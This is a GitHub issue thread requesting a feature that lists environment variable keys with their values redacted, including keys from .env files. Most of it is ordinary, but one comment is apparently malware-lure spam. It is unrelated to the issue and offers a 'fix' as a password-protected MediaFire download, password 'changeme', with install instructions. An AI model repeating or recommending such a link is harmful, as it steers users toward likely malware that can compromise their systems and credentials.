### ISSUE TITLE
Fetch Environment information

### ISSUE THREAD

**Issue by psychoSherlock** [The-Capstone-Project/OS-Scraper#10]
Fetch all environment information, including but not limited to:
ALL environment keys (Keys only). The value should be redacetd. Example
```bash
KEY1=REDACTED
KEY2=REDACTED
```
should also include keys and values in .env .env.local .env.production etc (common) files

more modification to this will be assigned soon

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Abinjoy025** [comment]
I have added my folder env_info which have the file main.go that fetches environment variables and hide private keys.
I created a PR
